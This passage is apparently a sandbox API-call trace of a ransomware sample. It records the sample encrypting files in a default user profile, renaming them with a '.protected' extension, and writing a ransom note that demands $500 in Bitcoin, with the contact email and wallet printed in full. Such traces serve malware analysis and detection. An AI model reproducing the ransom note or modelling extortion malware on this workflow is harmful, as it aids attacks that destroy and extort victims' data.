lpOverlapped=0x0) returned 1 [0095.348] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.349] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x16b, lpOverlapped=0x0) returned 1 [0095.349] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.349] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.349] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.349] CloseHandle (hObject=0xb4) returned 1 [0095.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.protected") returned 53 [0095.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.protected" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.protected")) returned 1 [0095.350] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.350] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.350] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RESTORE_FILES.txt") returned 44 [0095.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.351] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.351] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.351] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.351] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.351] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.351] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.351] CloseHandle (hObject=0xa4) returned 1 [0095.352] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="Windows") returned -1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files") returned -1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files (x86)") returned -1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="$Recycle.bin") returned 1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="System Volume Information") returned -1 [0095.352] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings") returned 35 [0095.352] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0095.352] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0095.352] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings\\*") returned 37 [0095.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.352] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="Windows") returned -1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="Program Files") returned -1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="Program Files (x86)") returned -1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="$Recycle.bin") returned 1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="System Volume Information") returned -1 [0095.352] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music") returned 26 [0095.352] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0095.352] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0095.352] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\*") returned 28 [0095.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.352] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.352] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.353] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.353] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.353] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\.") returned 28 [0095.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.353] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.353] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\." (normalized: "c:\\users\\default\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.353] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.353] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.353] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.353] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.353] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.353] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\..") returned 29 [0095.353] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.353] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.353] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.354] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.354] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.354] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.354] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.354] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.355] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.355] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.355] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.355] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.355] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0095.355] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.355] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.356] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.356] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.356] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.356] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.356] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.356] CloseHandle (hObject=0xb4) returned 1 [0095.356] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.protected") returned 48 [0095.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.protected" (normalized: "c:\\users\\default\\music\\desktop.ini.protected")) returned 1 [0095.357] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.357] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.357] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\RESTORE_FILES.txt") returned 44 [0095.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.358] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.358] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.358] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.358] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.359] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.359] CloseHandle (hObject=0xa4) returned 1 [0095.359] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="Windows") returned -1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="Program Files") returned -1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="Program Files (x86)") returned -1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="$Recycle.bin") returned 1 [0095.359] lstrcmpiW (lpString1="My Documents", lpString2="System Volume Information") returned -1 [0095.359] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents") returned 33 [0095.359] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0095.359] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0095.359] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents\\*") returned 35 [0095.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.359] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="Windows") returned -1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="Program Files") returned -1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="Program Files (x86)") returned -1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="$Recycle.bin") returned 1 [0095.359] lstrcmpiW (lpString1="NetHood", lpString2="System Volume Information") returned -1 [0095.359] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood") returned 28 [0095.359] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0095.359] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0095.359] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood\\*") returned 30 [0095.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.360] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Windows") returned -1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files") returned -1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files (x86)") returned -1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="$Recycle.bin") returned 1 [0095.360] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="System Volume Information") returned -1 [0095.360] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".protected") returned 0x0 [0095.360] lstrcmpW (lpString1="NTUSER.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0095.360] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.360] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.360] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrW (lpFirst="NTUSER.DAT", lpSrch=".txt") returned 0x0 [0095.360] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrW (lpFirst="NTUSER.DAT", lpSrch=".rar") returned 0x0 [0095.360] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0095.360] StrStrW (lpFirst="NTUSER.DAT", lpSrch=".zip") returned 0x0 [0095.361] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.370] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.370] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.371] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.371] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.372] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.372] CloseHandle (hObject=0xa4) returned 1 [0095.372] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.protected") returned 41 [0095.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.protected" (normalized: "c:\\users\\default\\ntuser.dat.protected")) returned 1 [0095.373] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="Windows") returned -1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="Program Files") returned -1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="Program Files (x86)") returned -1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="$Recycle.bin") returned 1 [0095.373] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="System Volume Information") returned -1 [0095.373] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.373] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".protected") returned 0x0 [0095.373] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2="RESTORE_FILES.txt") returned -1 [0095.373] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.373] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.373] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.373] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch=".txt") returned 0x0 [0095.374] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.374] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch=".rar") returned 0x0 